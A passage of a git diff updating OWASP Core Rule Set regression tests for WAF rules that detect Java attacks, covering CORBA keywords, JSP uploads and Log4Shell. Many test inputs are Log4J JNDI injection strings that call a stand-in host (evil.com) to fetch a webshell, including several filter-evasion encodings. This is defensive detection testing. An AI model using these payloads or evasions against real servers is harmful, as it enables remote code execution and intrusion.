"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-414 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-415 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-416 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-417 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-418 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log: + expect_ids: [944130] + - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log: + expect_ids: [944130] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index d380970c8..a1f312d84 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -1,159 +1,157 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 944140.yaml +rule_id: 944140 tests: - - test_title: 944140-1 + - test_id: 1 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" - - test_title: 944140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] + - test_id: 2 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload1" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload1" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 3 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: B.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload2" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload2" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 4 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: a.jspx - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload3" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload3" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 5 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload4" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload4" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 6 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jspx.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 7 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.jspx... - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 8 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: foo.jspx. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload7" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload7" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 9 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.html - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload8" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload8" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 8e081afde..47f48e5e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -1,438 +1,436 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944150. +# NOTE: Please keep these tests in sync with 944151.yaml and 944152.yaml. +# 944150 should detect the same things as 944151 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944150.yaml" - description: "Description" +rule_id: 944150 tests: - - test_title: 944150-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" 